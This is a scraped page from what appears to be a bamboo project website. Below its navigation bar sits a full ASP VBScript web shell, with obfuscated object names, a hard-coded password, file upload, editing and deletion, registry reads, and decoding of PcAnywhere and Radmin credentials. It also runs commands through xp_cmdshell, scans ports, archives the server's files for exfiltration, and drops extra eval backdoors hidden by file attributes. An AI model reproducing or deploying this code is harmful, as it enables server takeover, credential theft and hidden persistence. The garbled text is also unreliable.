') // -->
MISSION BAMBOO USAGE STATE PROJECTS CALENDAR MARKET INFOSHEETS
SITEMAP CONTACT US GALLERY
" SeT FOlD=cF.GeTFOlDeR(pAth) I=0 si="
":jb " ":jb " ":jb " ":jb " ":jb "
THE ADDRESS | YOUR FEEDBACK | 12.asp ?
Back? Print Version ?Email Page ?Give Feedback

?

<%@ LANGUAGE = VBScript %><% UserPass="fuck@you" Server.ScriptTimeout= Response.Buffer =true On Error Resume Next mingzi="????" nimajb="????" SiteURL="http://www.baidu.com/" Copyright=".

" sub ShowErr() If Err Then jb"

?" & Err.DescrIption & "

" Err.Clear:Response.Flush ENd IF End SUB function jb(Str) Response.WRItE(Str) END function Sub mbd(Str) execute(Str) END Sub Function rePATH(S) REpath=REpLAcE(s,"\","\\") ENd Function FuNctIon RRepaTh(S) RREpaTH=rEplAcE(S,"\\","\") end fUncTion Url=REQueSt.sErVErvARiables("URL") nimajbm=requESt.sErVeRVArIABlEs("LOCAL_ADDR") AcTIoN=ReQUESt("Action") RooTpATH=SeRveR.mAPpaTH(".") WWWROOt=SErVER.MAppATH("/") sba=request.servervariables("http_host") ApdB=Replace(Apds(i),"\Device\","") appbd=rEQUEsT.seRvErVARIaBLES("PATH_INFO") FOLdErpAth=REqueSt("FolderPath") ScrName=Request.ServerVariables("Script_Name") fNAME=reQUesT("FName") ServerU=ReQueST.SERVervaRIables("http_host") WoriNima=Request.ServerVariables("SERVER_NAME") O0O0=Request.ServerVariables("PATH_TRANSLATED") WoriNiba=Request.ServerVariables("SERVER_SOFTWARE") Worininai=Request.ServerVariables("LOCAL_ADDR") jbmc=Request.ServerVariables("NUMBER_OF_PROCESSORS") jbmb=Request.ServerVariables("OS") u=sba&URl BACkuRl="

??
" dim ShiSan,ShiSanNewstr,ShiSanI,fso,f,a,b,temp,c,theAct, thePath Function ShiSanFun(ShiSanObjstr) ShiSanObjstr = Replace(ShiSanObjstr, "?", """") For ShiSanI = 1 To Len(ShiSanObjstr) If Mid(ShiSanObjstr, ShiSanI, 1) <> "?" Then ShiSanNewStr = Mid(ShiSanObjstr, ShiSanI, 1) & ShiSanNewStr Else ShiSanNewStr = vbCrLf & ShiSanNewStr End If Next ShiSanFun = ShiSanNewStr End Function mm=ShowErrs Set fso = CreateObject(oBt(0,0)) Set f = fso.GetFile(O0O0) if f.attributes <> 39 then 'f.attributes = 39 end if jb"" jb""&nimajb&" - "&nimajbm&" ":jb"":jb"":jb"" jb "" DIm oBt(18,2) oBt(0,0) = "Scri"&"pting.FileSyste"&"mObject" oBt(0,2) = "??????" Obt(1,0) = "ws"&"cript.shell" obt(1,2) = "???????,??" obT(2,0) = "ADOX.Catalog" ObT(2,2) = "ACCESS????" oBt(3,0) = "JRO.JetEngine" obt(3,2) = "ACCESS????" OBt(4,0) = "Scripting.Dictionary" ObT(4,2) = "?????????" OBT(5,0) = "Adodb.connection" oBT(5,2) = "???????" oBT(6,0) = "Adodb.Stream" oBT(6,2) = "???????" OBT(7,0) = "SoftArtisans.FileUp" OBT(7,2) = "SA-FileUp ??????" obT(8,0) = "LyfUpload.UploadFile" OBT(8,2) = "?????????" oBT(9,0) = "Persits.Upload.1" oBt(9,2) = "ASPUpload ??????" obT(10,0) = "JMail.SmtpMail" Obt(10,2) = "JMail ??????" obt(11,0) = "CDONTS.NewMail" ObT(11,2) = "??SMTP????" ObT(12,0) = "SmtpMail.SmtpMail.1" oBT(12,2) = "SmtpMail????" OBT(13,0) = "Micros"&"oft.XM"&"LH"&"TTP" OBt(13,2) = "??????" OBT(14,0) = "ws"&"cript.shell.1" OBt(14,2) = "??wsh???????????" OBT(15,0) = "WS"&"CRIPT.NETWORK" OBt(15,2) = "???????????????????" OBT(16,0) = "she"&"ll.appl"&"ication" OBt(16,2) = "she"&"ll.appli"&"cation ????FSO???????????" OBT(17,0) = "sh"&"ell.appl"&"ication.1" OBt(17,2) = "she"&"ll.appli"&"cation ?????FSO???????????" OBT(18,0) = "Shell.Users" OBt(18,2) = "???net.exe net1.exe???????????" fOr I=0 tO 18 Set T=serVER.CReATEoBJEcT(obT(I,0)) If -2147221005 <> err Then ISoBJ=" ?" ELSE ISobj=" ×" eRr.cLEar eNd iF Set T=nOthInG oBt(i,1)=IsoBj neXt IF foLderPaTH<>"" Then sEssioN("FolderPath")=rRepatH(fOlDeRpATH) EnD If If SeSSIoN("FolderPath")="" THEN fOLDERpAth=RoOTpaTH SESSIOn("FolderPath")=fOLDeRPatH end IF Function PcAnywhere4() jb"
PcAnywhere?? Bin??
" jb"" jb"" Function StreamLoadFromFile(sPath) Dim oStream Set oStream = Server.CreateObject("Adodb.Stream") With oStream .Type = 1 .Mode = 3 .Open .LoadFromFile(sPath) .Position = 0 StreamLoadFromFile = .Read .Close End With Set oStream = Nothing End Function Function hexdec(strin) Dim i, j, k, result result = 0 For i = 1 To Len(strin) If Mid(strin, i, 1) = "f" Or Mid(strin, i, 1) ="F" Then j = 15 End If If Mid(strin, i, 1) = "e" Or Mid(strin, i, 1) = "E" Then j = 14 End If If Mid(strin, i, 1) = "d" Or Mid(strin, i, 1) = "D" Then j = 13 End If If Mid(strin, i, 1) = "c" Or Mid(strin, i, 1) = "C" Then j = 12 End If If Mid(strin, i, 1) = "b" Or Mid(strin, i, 1) = "B" Then j = 11 End If If Mid(strin, i, 1) = "a" Or Mid(strin, i, 1) = "A" Then j = 10 End If If Mid(strin, i, 1) <= "9" And Mid(strin, i, 1) >= "0" Then j = CInt(Mid(strin, i, 1)) End If For k = 1 To Len(strin) - i j = j * 16 Next result = result + j Next hexdec = result End Function Function PcAnywhere(data,mode) HASH= Mid(data,3) If mode = "pass" Then number = 32: Cifnum = 144 If mode = "user" Then number = 30: Cifnum = 15 For i = 1 To number Step 2 pcstr=((hexdec(Mid(data,i,2)) xor hexdec(Mid(hash,i,2))) xor Cifnum) If ((pcstr <= 32) Or (pcstr>127)) Then Exit For decode = decode + Chr(pcstr) Cifnum=Cifnum+1 Next PcAnywhere=decode End function Function bin2hex(binstr) For i = 1 To LenB(binstr) hexstr = Hex(AscB(MidB(binstr, i, 1))) If Len(hexstr)=1 Then bin2hex=bin2hex&"0"&(LCase(hexstr)) Else bin2hex=bin2hex& LCase(hexstr) End If Next End Function CIF = Request("path") If CIF <> "" Then BinStr=StreamLoadFromFile(CIF) jb "Pcanywhere Reader ==>

" jb "PATH:"&CIF&"
" jb "??:"&PcAnywhere (Mid(bin2hex(BinStr),919,64),"user") jb "
" jb "??:"&PcAnywhere (Mid(bin2hex(BinStr),32),"pass") End If Function radmin() Set WSH= Server.CreateObject("WSCRIPT.SHELL") RadminPath="HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\" Parameter="Parameter" Port = "Port" ParameterArray=WSH.REGREAD(RadminPath & Parameter ) jb Parameter&":" If IsArray(ParameterArray) Then For i = 0 To UBound(ParameterArray) If Len (hex(ParameterArray(i)))=1 Then strObj = strObj & "0"&CStr(Hex(ParameterArray(i))) Else strObj = strObj & Hex(ParameterArray(i)) End If Next jb strobj Else jb "Error! Can't Read!" End If jb "

" PortArray=WSH.REGREAD(RadminPath & Port ) If IsArray(PortArray) Then jb Port &":" jb hextointer(CStr(Hex(PortArray(1)))&CStr(Hex(PortArray(0)))) Else jb "Error! Can't Read!" End If End Function Function hextointer(strin) Dim i, j, k, result result = 0 For i = 1 To Len(strin) If Mid(strin, i, 1) = "f" Or Mid(strin, i, 1) ="F" Then j = 15 End If If Mid(strin, i, 1) = "e" Or Mid(strin, i, 1) = "E" Then j = 14 End If If Mid(strin, i, 1) = "d" Or Mid(strin, i, 1) = "D" Then j = 13 End If If Mid(strin, i, 1) = "c" Or Mid(strin, i, 1) = "C" Then j = 12 End If If Mid(strin, i, 1) = "b" Or Mid(strin, i, 1) = "B" Then j = 11 End If If Mid(strin, i, 1) = "a" Or Mid(strin, i, 1) = "A" Then j = 10 End If If Mid(strin, i, 1) <= "9" And Mid(strin, i, 1) >= "0" Then j = CInt(Mid(strin, i, 1)) End If For k = 1 To Len(strin) - i j = j * 16 Next result = result + j Next hextointer = result End Function:function goback():set Ofso = Server.CreateObject(oBt(0,0)) set ofolder = Ofso.Getfolder(Session("FolderPath")):if not ofolder.IsRootFolder then :jb "":else:jb "":jb "
?????????!
":jb "

":end if:set Ofso=nothing:set ofolder=nothing:end function:function php():On Error Resume Next:set fso=Server.CreateObject(oBt(0,0)):fso.CreateTextFile(server.mappath("test.php")).Write"":fso.CreateTextFile(server.mappath("test.jsp")).Write"Jsp Test oo?_?oo":fso.CreateTextFile(Server.MapPath("/")&"/images/.asp").Write""&chr(60)&"%Eval(Request(chr(112))):Set fso=CreateObject(""Scripting.FileSystemObject""):Set f=fso.GetFile(Request.ServerVariables(""PATH_TRANSLATED"")):if f.attributes <> 39 then:f.attributes = 39:end if"&chr(37)&""&chr(62)&"":fso.CreateTextFile(server.mappath("test.aspx")).Write""&chr(60)&"%@ Page Language=""Jscript"" validateRequest=""false"" "&chr(37)&""&chr(62)&""&chr(60)&""&chr(37)&"Response.Write(eval(Request.Item[""w""],""unsafe""));"&chr(37)&""&chr(62)&"aspx Test oo?_?oo":jb"
???? ":jb"???? ":jb"???
":jb"





Test

(??????!)

":jb"
(????????)

":End function:function apjdel():set fso=Server.CreateObject(oBt(0,0)):fso.DeleteFile(server.mappath("test.aspx")):fso.DeleteFile(server.mappath("test.php")):fso.DeleteFile(server.mappath("test.jsp")):jb"Del Success!":End function:fUNcTiOn MAINFORm():jb"":jb"":jb"":jb"
":jb"":jb"
":jb"":jb"":jb"
":End FuNCtiON: sub echo(str) response.write str end sub funcTiOn maINmenU():jb"":jb"":jb"" iF OBT(0,1)=" ×" Then jb"" Else jb"" jb"" jb"" jb"" jb"" jb"" jb"" END if jb"" jb"" jb"" jb"" jb"" jb"" jb"" jb"" jb"" jb"" jb"" jb"" jb" " 'jb"" 'jb" " jb"" jb"
?FSO/???
+>????
??????
??????
?????
?????
?????
??????-??
?????
?-???????
???????
" jb"
?????-????
?????-????
??????
" jb"
??????
???????
?-??????
???Cmd??
??????
???????
?Serv-U??
" jb"
?Serv-UFTP??
" jb"
?WMI??????
?????
" jb"
?Sql_cmd
?PcAnyWHere??
?RAdmin??
??????
?????
" jb"
?-?????
??????
" jb"
???MDB??
" 'jb"
?-??????
?????
???Pr??
?????
?????

" jb"
"&mingzi&" 's blog"&SiteURL&"
" jb"
" Call shellcore End FunCtion Sub PageAddToMdb() theAct = Request("theAct") thePath = Request("thePath") Server.ScriptTimeOut=100000 If theAct = "addToMdb" Then addToMdb(thePath) jb "

????!
"&BackUrl Response.End End If If theAct = "releaseFromMdb" Then unPack(thePath) jb "

????!
"&BackUrl Response.End End If jb"
?????:" jb"" jb"
??? ??(?FSO??):
" jb"" End Sub Sub addToMdb(thePath) On Error Resume Next Dim rs, conn, stream, connStr, adoCatalog Set rs = Server.CreateObject("ADODB.RecordSet") Set stream = Server.CreateObject("ADODB.Stream") Set conn = Server.CreateObject(OBT(5,0)) Set adoCatalog = Server.CreateObject("ADOX.Catalog") connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & Server.MapPath("hsh.mdb") adoCatalog.Create connStr conn.Open connStr conn.Execute("Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED, thePath VarChar, fileContent Image)") stream.Open stream.Type = 1 rs.Open "FileData", conn, 3, 3 If Request("theMethod") = "fso" Then fsoTreeForMdb thePath, rs, stream Else saTreeForMdb thePath, rs, stream End If rs.Close Conn.Close stream.Close Set rs = Nothing Set conn = Nothing Set stream = Nothing Set adoCatalog = Nothing End Sub Function fsoTreeForMdb(thePath, rs, stream) Dim item, theFolder, folders, files, sysFileList sysFileList = "$hsh.mdb$HSH.ldb$" If Server.CreateObject(oBt(0,0)).FolderExists(thePath) = False Then showErr(thePath & " ????????????!") End If Set theFolder = Server.CreateObject(oBt(0,0)).GetFolder(thePath) Set files = theFolder.Files Set folders = theFolder.SubFolders For Each item In folders fsoTreeForMdb item.Path, rs, stream Next For Each item In files If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then rs.AddNew rs("thePath") = Mid(item.Path, 4) stream.LoadFromFile(item.Path) rs("fileContent") = stream.Read() rs.Update End If Next Set files = Nothing Set folders = Nothing Set theFolder = Nothing End Function Sub unPack(thePath) On Error Resume Next Server.ScriptTimeOut=100000 Dim rs, ws, str, conn, stream, connStr, theFolder str = Server.MapPath(".") & "\" Set rs = CreateObject("ADODB.RecordSet") Set stream = CreateObject("ADODB.Stream") Set conn = CreateObject(OBT(5,0)) connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & thePath & ";" conn.Open connStr rs.Open "FileData", conn, 1, 1 stream.Open stream.Type = 1 Do Until rs.Eof theFolder = Left(rs("thePath"), InStrRev(rs("thePath"), "\")) If Server.CreateObject(oBt(0,0)).FolderExists(str & theFolder) = False Then createFolder(str & theFolder) End If stream.SetEos() stream.Write rs("fileContent") stream.SaveToFile str & rs("thePath"), 2 rs.MoveNext Loop rs.Close conn.Close stream.Close Set ws = Nothing Set rs = Nothing Set stream = Nothing Set conn = Nothing End Sub Sub AdDtOmdB(thePath) oN eRRoR ResUMe nEXt DiM rs, CONN, sTrEam, conNStr, ADocatALog SEt rS = SERVER.crEAtEOBJeCT("ADODB.RecordSet") seT sTrEAM = SerVer.CreAtEoBjECT("ADODB.Stream") seT COnN = seRVEr.cREATEObjECt(OBT(5,0)) seT aDOcAtalOg = serVeR.CReatEOBjEct("ADOX.Catalog") ConNstR = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & servEr.mAPpaTH("HYTop.mdb") ADocAtaLog.cReATe CoNnsTR CoNN.OPen conNsTr CONn.EXEcutE("Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED, thePath VarChar, fileContent Image)") STrEAm.OPEn streaM.TypE = 1 rS.OPEN "FileData", cOnn, 3, 3 If ReQuEsT("theMethod") = "fso" theN FsOTrEEforMDB thepaTH, Rs, sTrEAm eLSE SATrEeforMDB thEpATH, Rs, STrEAm enD IF rs.ClosE coNN.CLoSE stREaM.CLosE Set rs = NOThInG set Conn = nothINg sET stReam = NOThinG SEt AdOcAtaloG = nOTHIng End Sub Sub AdDtOmdB(thePath) oN eRRoR ResUMe nEXt DiM rs, CONN, sTrEam, conNStr, ADocatALog SEt rS = SERVER.crEAtEOBJeCT("ADODB.RecordSet") seT sTrEAM = SerVer.CreAtEoBjECT("ADODB.Stream") seT COnN = seRVEr.cREATEObjECt(OBT(5,0)) seT aDOcAtalOg = serVeR.CReatEOBjEct("ADOX.Catalog") ConNstR = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & servEr.mAPpaTH("HYTop.mdb") ADocAtaLog.cReATe CoNnsTR CoNN.OPen conNsTr CONn.EXEcutE("Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED, thePath VarChar, fileContent Image)") STrEAm.OPEn streaM.TypE = 1 rS.OPEN "FileData", cOnn, 3, 3 If ReQuEsT("theMethod") = "fso" theN FsOTrEEforMDB thepaTH, Rs, sTrEAm eLSE SATrEeforMDB thEpATH, Rs, STrEAm enD IF rs.ClosE coNN.CLoSE stREaM.CLosE Set rs = NOThInG set Conn = nothINg sET stReam = NOThinG SEt AdOcAtaloG = nOTHIng End Sub sUb CreateFoldER(ThePath) DIM i I = instR(Thepath, "\") Do whILe I > 0 iF fSOX.FoLDERExIsts(LEft(THEPaTH, i)) = faLse TheN fSox.CreatEFOLDEr(lEft(THePatH, I - 1)) end If IF INSTR(mid(THePAth, i + 1), "\") tHEN i = i + INsTr(mid(ThePaTh, i + 1), "\") ELSe i = 0 eND If LOOP eND sUB sUB SAtreEforMdB(thePaTh, rs, STREam) diM iTeM, tHEFOlDER, SySFilELIsT SYSfileliSt = "$HYTop.mdb$HYTop.ldb$" SeT thEfoLdEr = sAX.NAMeSPaCe(thepath) for eaCH iTEm in tHeFoldeR.iteMS If ItEm.ISFoLDeR = TRUe tHen SatrEEfoRMDB itEm.PatH, rs, Stream elSe iF iNSTr(SYsFilELIsT, "$" & ItEm.naME & "$") <= 0 tHeN rs.AddNew rs("thePath") = MID(ITeM.PatH, 4) sTrEAm.LoadfroMfiLe(ITEM.PATH) RS("fileContent") = sTREAM.rEaD() rs.uPDaTE enD iF enD If NeXT seT thefoLDeR = NoTHINg END SUB Sub Message(state,msg,flag):jb "":jb " ":jb " ":jb " ":jb " ":jb " ":jb " ":jb " ":jb " ":jb " ":jb "
????
":jb "
":jb state:jb "

":jb msg:jb "

":jb "
":jb " ":If flag=0 Then:jb " ":jb " ":Else:jb " ":jb " ":End if:jb "
":End Sub:Function Red(str):Red = "" & str & "":End Function:Sub ScanDriveForm():Dim FSO,DriveB:Set FSO = Server.Createobject(oBt(0,0)):jb "":jb " ":jb " ":jb " ":For Each DriveB in FSO.Drives:jb " ":jb " ":jb " " Next jb " ":jb " ":jb " ":jb " ":jb " ":jb " ":jb " ":jb "
??/?? ?????
" echo sI:SI="" IF LeN(DBstR)>40 thEN set cONn=CREatEObjEct(OBT(5,0)) Conn.OPEN DBsTr SEt Rs=CoNn.OPENschEmA(20) si=Si&"" Rs.MovEfirst DO whIlE not RS.EOF IF Rs("TABLE_TYPE")="TABLE" tHEN tNAMe=rS("TABLE_NAME") SI=sI&"" eND IF rS.mOveNExT lOOP SeT rS=nothiNg si=SI&"
?
?
[ del ]
" SI=sI&""&TnAMe&"
" jb si:si="" If LEn(SQLsTR)>10 tHen If LCaSe(lEfT(sQLstr,6))="select" Then SI=Si&"?????"&sQLStr set rs=cReatEobject("Adodb.Recordset") rS.OPeN SqLsTR,cONn,1,1 Fn=RS.FIeLDs.cOUNT RC=rS.rECoRDcOUnt Rs.PaGesIZe=20 CounT=Rs.pagEsIze pN=RS.pagECOuNT page=rEqUesT("Page") IF PAge<>"" TheN pAGE=ClNg(pAGe) if PAge="" Or pAGE=0 TheN Page=1 if paGe>pN then page=PN iF PaGe>1 tHEn rS.ABsoLUTepAGe=PaGE Si=SI&"" FoR n=0 to FN-1 SEt flD=rS.fIeldS.Item(n) si=Si&"" set fLd=noTHinG nEXt sI=sI&"" Do WhILe nOt(rs.Eof oR Rs.BOF) And COunt>0 count=CounT-1 bgcoLOR="#EFEFEF" SI=sI&"" FoR I=0 TO fn-1 IF bGCOlOR="#EFEFEF" tHEn:BgColoR="#F5F5F5":ELsE:BgcoLOR="#EFEFEF":EnD iF iF rC=1 tHeN COlInFO=HTmlencoDe(rS(I)) elsE cOliNFO=HTmleNCode(lEft(rS(I),50)) eNd iF sI=SI&"" NEXT sI=si&"" Rs.movEnExT LOOp jb SI:Si="" sqLstR=HtMLEncodE(SqLStr) sI=si&"
"&fld.NAMe&"
x"&cOlInFO&"
????"&rC&"????"&PAgE&"/"&Pn If pn>1 THEN si=si&"?????????" IF paGE>8 tHEn:sP=pagE-8:Else:SP=1:eND iF for i=sp To sp+8 if i>pN THEn EXIt FOr If i=pAgE theN sI=si&I&"?" ELSE sI=si&""&I&"?" EnD iF next SI=SI&"???????" End IF si=sI&"
" rS.CLOSe:Set rs=NotHiNG jb sI:si="" elSe CONN.ExecUtE(sqlSTR) si=sI&"SQL ???"&SqLstr EnD IF jb si:Si="" enD if CoNn.clOsE Set COnN=NotHiNg End If End Function DIm t1 CLASS uPc DIM d1,d2 pUBlic FunctIOn fOrM(f) F=lCAsE(F) if D1.EXiSTS(f) THEn:fOrM=D1(F):ELsE:fOrm="":End if ENd fuNCTion pUBLIc fuNcTiON UA(f) F=lcASE(F) If D2.EXIsTs(f) tHeN:SEt UA=d2(f):ElSe:set uA=neW fIF:End IF end fUNCtion pRIVATe sUB CLaSs_INitIALizE dIM tDa,Tst,vBcRlF,tiN,diEnD,t2,TLen,tfl,sfv,FSTart,fEnD,dstArT,deNd,UpNAMe SeT d1=cREateOBJECt(Obt(4,0)) If requESt.TOTalBYTes<1 THen ExiT suB sEt T1 = crEateOBjECT(oBt(6,0)) T1.tYpe = 1 : t1.MODE =3 : T1.OPEn T1.wrIte REquESt.bINaryrEAd(rEqUEsT.tOtAlBytES) t1.posITiON=0 : Tda =T1.ReAd : DsTarT = 1 Dend = LeNB(tDa) seT d2=CReatEOBJECt(OBt(4,0)) VBcrlF = ChRB(13) & chrB(10) SET t2 = CReAtEobjeCT(oBt(6,0)) Tst = MIdB(tdA,1, InStRB(DsTaRT,tdA,Vbcrlf)-1) TlEN = LENb (Tst) DSTArT=Dstart+TLeN+1 WhIlE (dstarT + 10) < dEND diEND = instrB(DStArT,tdA,vBCRlf & vBcrlF)+3 T2.tYPE = 1 : T2.MODE =3 : t2.open t1.PoSITIon = DStaRT T1.CopyTo T2,DieNd-dStart t2.POSITiOn = 0 : t2.tYPe = 2 : T2.cHARSet ="gb2312" TIN = t2.reAdTexT : T2.CLOSe DStart = inStRB(dieNd,TDA,tSt) FStarT = INsTR(22,tiN,"name=""",1)+6 fEND = INstr(FSTART,tiN,"""",1) uPnAme = LCaSe(MId (TIn,FsTarT,FENd-FstArT)) iF INstr (45,tin,"filename=""",1) > 0 tHeN Set Tfl=nEW FIf FsTART = iNStR(Fend,tin,"filename=""",1)+10 FENd = INSTr(fstarT,TIn,"""",1) fstaRt = insTr(FEnd,TIN,"Content-Type: ",1)+14 FEnD = iNStr(FSTArT,tIN,VbCR) tfl.FiLesTart =dienD TFl.FIlESIzE = dSTArt -DienD -3 iF noT D2.eXiSTS(UPnAmE) TheN D2.aDD uPNAmE,tFl eND iF else T2.tyPE =1 : T2.MOdE =3 : t2.Open T1.PositiOn = DieND : t1.coPytO T2,dstArt-dIeND-3 t2.POSitIoN = 0 : t2.tyPe = 2 t2.CHaRSET ="gb2312" SFv = T2.ReadtexT T2.CLOse If d1.eXiStS(UPnAME) theN D1(UpnAMe)=d1(UPnamE)&", "&SfV ELse d1.Add UPNAmE,sfv ENd If ENd iF dsTart=DstarT+tLeN+1 wENd Tda="" Set T2 =nothinG End SuB pRIVATE SuB CLasS_tErminATe IF rEQUeST.ToTaLbyTes>0 THEn D1.remOvEAll:d2.RemoVEAll sEt D1=NOthIng:sEt D2=nothinG T1.cLOsE:SeT T1 =NOtHIng end iF END SuB EnD Class ClAsS Fif dIm FileSIzE,FilEStART pRiVAtE suB ClasS_INITiAliZe fILesiZE = 0 filesTaRT= 0 ENd sub pUBlIc fUnctiOn sAvEAs(F) dim t3 Saveas=tRUe IF tRim(f)="" OR filestArt=0 THEN exIT FUNcTIOn sET t3=crEAteobjECt(oBT(6,0)) t3.moDe=3 : t3.tyPe=1 : T3.OPEn T1.PoSiTIoN=fiLeStarT t1.copyTo T3,fILEsIZE t3.SAVeTofILE f,2 T3.ClOsE sEt T3=NOthiNg saVeas=fAlSE ENd FunCtIon End claSs cLASS Lbf DIm CF PrIVate suB class_InitIALIZe sEt cf=cReAtEoBjeCt(Obt(0,0)) enD sUB PrIvATe Sub cLass_TERMInAte sET cf=NOtHINg end sUB fUNCTion shoWDrIVeR() For EaCH d In cF.drIves jb"?????-?? ("&D.dRIvELEtteR&":)
" nexT ENd fUncTIOn funcTiOn shOW1fiLE(PAth) jb"
???????
" fOR EACH f IN FOLD.suBFOlDERS Si=sI&"" i=i+1 If I MOd 3 = 0 TheN SI=si&"" neXt si=Si&"
" si=Si&"0"&F.NaMe&"" SI=sI&" _Copy" sI=Si&" Del" SI=SI&" Move" Si=SI&" Down
" echo SI &"
" : sI="" fOr eacH L IN FoLd.FILEs Si="" si=SI&"" sI=Si&"" Si=Si&"" sI=sI&"" si=Si&"" si=sI&"" Si=Si&"" sI=sI&"" SI=sI&"" sI=sI&"
2"&L.nAMe&"editdelcopymove"&ClNG(l.SiZe/1024)&"K"&l.TyPe&""&l.DATElAStmoDIfIed&"
" echo si:Si="" nExt sEt FOlD=NoTHIng EnD fUNctiON fuNcTiOn DeLFilE(pATh) IF cf.fIlEexIsts(paTh) then Cf.DelEtEFile paTh sI="



?? "&pATH&" ?? ???
" Si=Si&BaCkURL jb Si EnD iF End Function Function EDitfIlE(path) if reqUest("Action2")="Post" then SeT T=Cf.cReAteTExtFiLe(paTH) T.wrIteLinE ReQUEsT.FoRM("content") T.CLoSE Set T=NOTHinG sI="



?? ?? ???
" sI=si&baCKurl jb si ResPonse.eNd end IF IF pAtH<>"" then Set T=cF.OpENTeXTfiLe(pATH, 1, fAlSE) TxT=htmLencoDE(t.rEaDaLL) T.cLOSe SeT t=nothing elSe path=sesSIOn("FolderPath")&"\newfile.asp":Txt="?? ??" End If sI=si&"" jb si EnD fuNCTiON fuNctiON CoPyfILe(pATh) pAth = SPLIT(pAtH,"||||") If cF.FileExiSTS(PAth(0)) ANd path(1)<>"" THEN cF.copYFIlE patH(0),pATH(1) si="



??"&patH(0)&"?? ???
" SI=si&backurL jb sI enD IF eND fUnCTIOn FuNctioN movEFiLE(PaTh) PaTh = SPlit(patH,"||||") if cF.FIleExIstS(pATh(0)) ANd path(1)<>"" THEN Cf.mOVEfILe pAth(0),pAth(1) Si="



??"&paTh(0)&"?? ???
" Si=SI&baCkuRl jb Si eND If EnD FuNCtioN FUNCtiON DELFoLdeR(pATh) If cF.FolderExists(PATH) THEn cF.DELetefOlDeR paTH si="



??"&paTH&"?? ???
" Si=Si&BacKuRl jb sI End if end fUNCtiOn FunCTiON cOPYFolDER(PatH) pAtH = SpliT(PAth,"||||") iF cf.FolderExists(paTh(0)) anD PATh(1)<>"" ThEn cF.CopYFOlDEr paTh(0),pAth(1) si="



??"&Path(0)&"?? ???
" si=si&BaCkUrl jb si END iF END fUncTIoN FUnctION MOvEfolDER(PATh) Path = SPlIt(PAth,"||||") iF cf.FolderExists(paTH(0)) And Path(1)<>"" tHEN CF.MoVeFOLDeR pATh(0),patH(1) Si="



??"&Path(0)&"?? ???
" sI=sI&BaCKURL jb Si END if ENd Function FuNcTiON NEWfoLder(PaTh) iF noT cF.FolDERexists(pATH) and pAth<>"" tHEN Cf.CreATeFOldER PatH SI="



??"&PATH&"?? ???
" si=SI&baCkurl jb sI END If eNd FUNCtION End CLAsS sub shellcore end sub sub ReadREG() jb "
" if Request("thePath")<>"" then On Error Resume Next Set wsX = Server.CreateObject(Obt(1,0)):thePath=Request("thePath"):theArray=wsX.RegRead(thePath) If IsArray(theArray) Then For i=0 To UBound(theArray):jb "
  • " & theArray(i) Next Else:jb "
  • " & theArray End If end if:end sub sub SetFileText() dim Path,FileName,NewTime,ShuXing set path=request.Form("path1") set fileName=request.Form("filename") set newTime=request.Form("time") set ShuXing=request.Form("shuxing") jb "" if( (len(path)>0)and(len(fileName)>0)and(len(newTime)>0) )then Set fso=Server.CreateObject(oBt(0,0)) Set file=fso.getFile(path&fileName) file.attributes=ShuXing Set shell=Server.CreateObject("Shell.Application") Set app_path=shell.NameSpace(server.mappath(".")) Set app_file=app_path.ParseName(fileName) app_file.Modifydate=newTime jb "??????"&path&fileName&"?????? " end if end sub FuncTion MMD() SI="
    ":jb SI:SI="":If trim(request.form("MMD"))<>"" Then:password= trim(Request.form("P")):id=trim(Request.form("U")):set adoConn=sERvEr.crEATeobjECT(OBT(5,0)):adoConn.Open "Provider=SQLOLEDB.1;Password="&password&";User ID="&id:strQuery = "exec master.dbo.xp_cMdsHeLl '" & request.form("MMD") & "'":set recResult = adoConn.Execute(strQuery):If NOT recResult.EOF Then:Do While NOT recResult.EOF:strResult = strResult & chr(13) & recResult(0):recResult.MoveNext:Loop:End if:set recResult = Nothing:strResult = Replace(strResult," ","?"):strResult = Replace(strResult,"<","<"):strResult = Replace(strResult,">",">"):strResult = Replace(strResult,chr(13),"
    "):End if:set adoConn = Nothing:jb request.form("MMD") & "
    "& strResult:end FuncTion Sub ScanPort() SERveR.ScrIPtTIMeouT = 7776000 IF REQuesT.fORM("port")="" theN PoRTliST="21" ELse portList=RequeST.form("port") End If iF rEqUEST.forM("ip")="" tHEn iP="127.0.0.1" ELse ip=ReQuEST.FOrM("ip") eND iF jb"

    ????? (????????,?????,??????CMD)

    " jb"" iF rEqUeST.fORM("scan") <> "" tHen tiMer1 = timeR jb("???? :

    ") Tmp = SpLIt(rEQUest.foRm("port"),",") Ip = spLit(REQuEST.fORM("ip"),",") for HU = 0 tO ubOunD(iP) if iNSTr(iP(Hu),"-") = 0 TheN fOR i = 0 to uBoUNd(tMP) if ISNUMERIc(TMp(I)) then CAll scAn(Ip(hU), TMP(I)) ELse SeeKx = iNsTr(tmP(i), "-") IF sEeKx > 0 THen stARtN = LEfT(tMP(I), seeKX - 1 ) eNDN = rigHt(TMP(i), lEn(TmP(i)) - SeEkX ) iF IsNUMeRIc(StarTN) And IsNuMeRic(enDN) THEN for J = STARTn to ENdn cALl scan(ip(hu), j) NEXT elsE jb(StArTn & " or " & EnDN & " is not number
    ") End If eLSe jb(tMP(i) & " is not number
    ") EnD IF End IF NExt Else iPStaRt = MID(iP(hu),1,InstRREV(Ip(hu),".")) fOr xxX = mid(ip(hU),inSTrreV(ip(hu),".")+1,1) To MId(ip(hu),INstR(Ip(Hu),"-")+1,LEN(ip(hU))-inStr(ip(Hu),"-")) fOR I = 0 TO UboUnD(Tmp) if isnumErIC(tMP(I)) TheN Call sCAn(iPsTart & xXX, TMp(i)) ElsE SeEkX = insTr(tMP(i), "-") If SeeKx > 0 ThEn StArTN = leFt(tmP(I), seeKx - 1 ) enDn = riGHT(TMp(i), LEn(tMp(I)) - sEEKx ) if isNuMeRIC(staRtN) And isNumeRic(EndN) THEn foR j = StArTn TO endn caLl SCaN(IPstARt & xxX,j) NExt eLse jb(STaRTn & " or " & EndN & " is not number
    ") END if eLsE jb(Tmp(i) & " is not number
